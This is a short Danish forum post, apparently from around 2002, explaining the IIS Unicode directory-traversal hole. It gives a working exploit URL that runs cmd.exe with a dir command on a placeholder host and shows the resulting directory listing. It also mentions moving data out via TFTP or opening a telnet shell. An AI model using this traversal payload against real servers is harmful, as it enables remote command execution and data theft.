Hesten er på det computer der laver forbindelsen... Du kunne i princippet lave det samme i en browser, bare skrive 
http://victem/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dirDet ville give noget i stil med det her i browseren hvis victem er et sårbart system:
 Enheden i drev D har ikke noget navn
 Enhedens serienummer er 1708-195E
 Indhold af D:\Desktop
.              <DIR>        03-11-01  16.53 .
..             <DIR>        03-11-01  16.53 ..
TRILLIAN LNK           424  16-09-02   0.17 Trillian.lnk
BILLEDER       <DIR>        01-05-02   0.07 Billeder
NIKKI          <DIR>        17-03-02   2.13 Nikki
DIV            <DIR>        05-02-02  15.38 div
DATABA~1       <DIR>        06-04-02  15.08 Database Backups
HLSW     LNK           373  02-09-02  22.47 HLSW.lnk
WEBSHO~1 LNK           363  17-09-02  19.36 Webshots Desktop!.lnk
SNAGIT~2 LNK           434  01-07-02  17.37 SnagIt Studio 6.lnk
NETMAN         <DIR>        18-05-02  15.58 netman
OUTLOO~1 LNK           430  30-10-02   8.54 Outlook Express with OE-QuoteFix.lnk
COUNTE~1 LNK           412  24-07-02  18.59 Counter Strike.lnk
LYD            <DIR>        17-02-02  20.23 lyd
STREAM~1 LNK           395  22-09-02  13.58 Streamload Uploader.lnk
SKINNER  LNK           373  30-05-02  15.36 Skinner.lnk
        27 fil(er)    400.652.938 byte
        19 mappe(r)        1.156,84 MB ledig
Altså output fra dir kommandoen. Her skrivebordet fra min egen windows ME computer i en noget forkortet udgave ;)
Data kan på NT/XP/2K overføres med TFTP uden det store besvær, eller man kunne måske endda lave en shell man kunne forbinde til via telnet.. Det er kun op til angriberens fantasi hvad der er muligt hvis man har fuld adgang til systemet.